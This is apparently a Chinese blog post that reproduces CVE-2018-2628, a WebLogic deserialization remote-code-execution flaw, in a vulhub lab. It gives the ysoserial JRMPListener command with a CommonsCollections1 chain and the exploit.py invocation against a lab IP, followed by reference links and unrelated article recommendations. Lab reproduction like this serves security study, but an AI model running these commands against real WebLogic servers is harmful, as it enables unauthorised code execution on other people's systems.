【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
逊嘘6 分钟前
【Java语言】抽象类与接口
java·开发语言·jvm
morris13113 分钟前
【SpringBoot】Xss的常见攻击方式与防御手段
java·spring boot·xss·csp
七星静香38 分钟前
laravel chunkById 分块查询 使用时的问题
java·前端·laravel
Jacob程序员39 分钟前
java导出word文件(手绘)
java·开发语言·word
ZHOUPUYU40 分钟前
IntelliJ IDEA超详细下载安装教程(附安装包)
java·ide·intellij-idea
stewie643 分钟前
在IDEA中使用Git
java·git
Elaine2023911 小时前
06 网络编程基础
java·网络
G丶AEOM1 小时前
分布式——BASE理论
java·分布式·八股
落落鱼20131 小时前
tp接口 入口文件 500 错误原因
java·开发语言
想要打 Acm 的小周同学呀1 小时前
LRU缓存算法
java·算法·缓存